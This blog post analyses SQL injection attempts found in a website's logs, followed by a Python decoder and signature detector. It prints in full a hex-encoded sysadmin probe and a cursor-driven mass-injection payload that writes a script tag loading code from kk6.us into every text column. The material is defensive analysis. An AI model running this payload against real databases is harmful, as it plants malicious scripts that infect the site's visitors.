Decoding the SQL injection code hitting the website
Time: 2008/6/1 0:23:12
Last time, on my QQ space, I mentioned that SQL injection using HEX encoding can slip past a typical IDS. Sure enough, over the past few days the site has logged exactly this kind of illegal scan. Luckily my site was prepared in advance. Let's see what these guys were up to; here are a few of the records:
Submitted parameter: 1 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1
Decode this: 0x730079007300610064006D0069006E00
Content: sysadmin
That one is obvious: it first checks whether the connection has the sysadmin role. Next comes this one:
Submitted parameter: 1';dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f25366225366225333625326525373525373332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--
Decoding it gives: dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR
That still looks a bit messy, so here it is converted to lowercase: declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor
OK, once decoded it is basically readable. In short: as long as the system has a SQL injection hole, the code above gets executed. It uses a cursor to walk every table and every text column in the database and inserts this code into each column: </title><script src=http://%6b%6b%36%2e%75%73/1.js></script>
The part (%6b%6b%36%2e%75%73) is URL-encoded as well; decoded, it becomes: kk6.us
So the code inserted into the database columns is: </title><script src=http://kk6.us/1.js></script>
From then on, as soon as your web page reads a column carrying this code from the database, something goes wrong: the page pulls the 1.js file from kk6.us, and once you visit it, heh, you're done for...
That was a brief introduction to the injection method that has been going around lately. If anything I said is wrong, I welcome the experts' criticism.
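As an added example (not part of the original post), here is a small Python decoder and detector for records like the two above. It reverses the 0x... literals (the argument to IS_SRVROLEMEMBER is UTF-16LE, which is why every second byte is 00; the varchar payload is plain single-byte text), then reverses the %xx encoding of the script host inside the decoded payload, and finally matches the result against a few patterns for the sysadmin probe and the cursor-driven mass update. The first sample is the probe record verbatim; the second is rebuilt by re-encoding the lowercase SQL decoded above rather than pasting the full hex string. The function names and signature labels are my own.

```python
# Added example (not from the original post): decode and flag the two kinds of
# hex-encoded SQL Server injection records shown above. The signature labels and
# the function names are my own; the samples are rebuilt from the post's text.
import re
from urllib.parse import unquote

# A T-SQL 0x... literal; the lookbehind keeps "10x5"-style text from matching.
HEX_LITERAL = re.compile(r"(?<![0-9A-Za-z])0x([0-9A-Fa-f]+)")


def decode_hex_literal(hex_digits: str) -> str:
    """Turn the digits of a 0x... literal into text.

    An nvarchar argument (IS_SRVROLEMEMBER takes one) arrives as UTF-16LE, so every
    second byte is 0x00; a varchar payload is single-byte text. Pick by that pattern.
    """
    if len(hex_digits) % 2:
        hex_digits = "0" + hex_digits      # SQL Server left-pads an odd-length literal
    raw = bytes.fromhex(hex_digits)
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")           # one char per byte, never raises


def decode_parameter(value: str) -> str:
    """URL-decode, expand every 0x literal, URL-decode again (the script host is
    %-encoded inside the hex), and lowercase so mixed-case keywords line up."""
    text = unquote(value)
    text = HEX_LITERAL.sub(lambda m: decode_hex_literal(m.group(1)), text)
    return unquote(text).lower()


# Patterns applied to the parameter as received ...
RAW_SIGNATURES = {
    "hex literal cast to string": re.compile(r"cast\s*\(\s*0x[0-9a-f]+\s+as\s+n?varchar", re.I),
    "dynamic exec of a variable": re.compile(r"exec\s*\(\s*@\w+\s*\)", re.I),
}
# ... and to the fully decoded, lowercased text.
DECODED_SIGNATURES = {
    "sysadmin role probe": re.compile(r"is_srvrolemember\s*\("),
    "cursor over sysobjects/syscolumns": re.compile(r"cursor\s+for\s+select.*sysobjects.*syscolumns", re.S),
    "script tag written into rows": re.compile(r"update\s+\[.*\].*<script\s+src=", re.S),
}


def analyse(value: str) -> dict:
    """Return the decoded text, the signature names that fired and any script hosts."""
    decoded = decode_parameter(value)
    hits = [name for name, rx in RAW_SIGNATURES.items() if rx.search(value)]
    hits += [name for name, rx in DECODED_SIGNATURES.items() if rx.search(decoded)]
    hosts = sorted(set(re.findall(r"src=https?://([^/\s>]+)", decoded)))
    return {"decoded": decoded, "hits": hits, "hosts": hosts}


# Sample 1: the sysadmin probe, verbatim from the log record quoted above.
SAMPLE_PROBE = ("1 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) "
                "as varchar(1))+char(124)=1")

# Sample 2: the cursor payload, re-encoded from the lowercase SQL decoded above
# instead of pasting the original hex string (constructed sample).
PAYLOAD_SQL = (
    "declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select "
    "a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and "
    "(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch "
    "next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+"
    "'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''</title><script src=http://"
    "%6b%6b%36%2e%75%73/1.js></script>''') fetch next from table_cursor into @t,@c end "
    "close table_cursor deallocate table_cursor"
)
SAMPLE_CURSOR_PAYLOAD = ("1';declare @s varchar(4000);set @s=cast(0x"
                         + PAYLOAD_SQL.encode("ascii").hex()
                         + " as varchar(4000));exec(@s);--")

if __name__ == "__main__":
    for sample in (SAMPLE_PROBE, SAMPLE_CURSOR_PAYLOAD, "42"):
        result = analyse(sample)
        print("hits:", result["hits"], "hosts:", result["hosts"])
        print("decoded:", result["decoded"][:120])
```

Running the script on the two records reports the sysadmin probe for the first and all four signatures plus the host kk6.us for the second, while a plain value such as 42 produces no hits. The point of decoding before matching is the one the post makes: a filter that only looks for keywords in the raw parameter sees nothing but a hex string, so the check has to undo the encoding first.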